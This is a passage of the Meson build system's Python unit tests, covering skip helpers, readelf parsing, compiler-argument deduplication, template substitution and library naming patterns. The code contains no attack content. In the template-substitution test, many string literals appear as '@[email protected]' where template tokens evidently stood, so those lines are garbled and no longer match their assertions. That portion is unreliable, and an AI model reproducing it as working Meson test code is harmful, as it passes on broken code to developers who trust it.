Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
curdir = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(curdir)
def get_dynamic_section_entry(fname, entry):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return m.group(1)
return None # The file did not contain the specified entry.
def get_soname(fname):
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def is_pull():
# Travis
if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
return True
# Azure
if 'SYSTEM_PULLREQUEST_ISFORK' in os.environ:
return True
return False
def _git_init(project_dir):
subprocess.check_call(['git', 'init'], cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', '[email protected]'], cwd=project_dir)
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if feature not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
def new_which(cmd, *kwargs):
if cmd == 'pkg-config':
return None
return old_which(cmd, *kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10'), '2016.10')
self.assertEqual(searchfunc('2016.10 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('oops v1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.oops 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.x'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class_none_flush(self):
cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, mock.Mock())
a = cc.compiler_args(['-I.'])
#first we are checking if the tree construction deduplicates the correct -I argument
a += ['-I..']
a += ['-I./tests/']
a += ['-I./tests2/']
#think this here as assertion, we cannot apply it, otherwise the CompilerArgs would already flush the changes:
# assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..', '-I.'])
a += ['-I.']
a += ['-I.', '-I./tests/']
self.assertEqual(a, ['-I.', '-I./tests/', '-I./tests2/', '-I..'])
#then we are checking that when CompilerArgs already have a build container list, that the deduplication is taking the correct one
a += ['-I.', '-I./tests2/']
self.assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..'])
def test_compiler_args_class_d(self):
d = mesonbuild.compilers.DmdDCompiler([], 'fake', MachineChoice.HOST, 'info', 'arch')
# check include order is kept when deduplicating
a = d.compiler_args(['-Ifirst', '-Isecond', '-Ithird'])
a += ['-Ifirst']
self.assertEqual(a, ['-Ifirst', '-Isecond', '-Ithird'])
def test_compiler_args_class_clike(self):
cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, mock.Mock())
# Test that empty initialization works
a = cc.compiler_args()
self.assertEqual(a, [])
# Test that list initialization works
a = cc.compiler_args(['-I.', '-I..'])
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cc.compiler_args(['-I.', '-I.']), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# -Wl,-lfoo is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@[email protected]', '@[email protected]', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@[email protected]', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@[email protected]', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@[email protected]', '@[email protected]', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@[email protected]', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@[email protected]', '@[email protected]', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Too many inputs
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@[email protected]', '@[email protected]', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@[email protected]', '@[email protected]', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Can not be used as context manager because we need to
# open it a second time and this is not possible on
# Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
def test_unholder(self):
unholder = mesonbuild.mesonlib.unholder
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
holders = [holder1, holder3]
self.assertEqual(1, unholder(holder1))
self.assertEqual([1], unholder([holder1]))
self.assertEqual([1, 3], unholder(holders))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
# flatten nested lists
kwargs = {'sources': [1, [2, [3]]]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
def test_pkgconfig_module(self):
dummystate = mock.Mock()
dummystate.subproject = 'dummy'
_mock = mock.Mock(spec=mesonbuild.dependencies.ExternalDependency)
_mock.pcdep = mock.Mock()
_mock.pcdep.name = "some_name"
_mock.version_reqs = []
_mock = mock.Mock(held_object=_mock)
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_libs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_reqs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc._find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
@skipIfNoPkgconfig
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.compiler_options.host['c']['link_args'] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
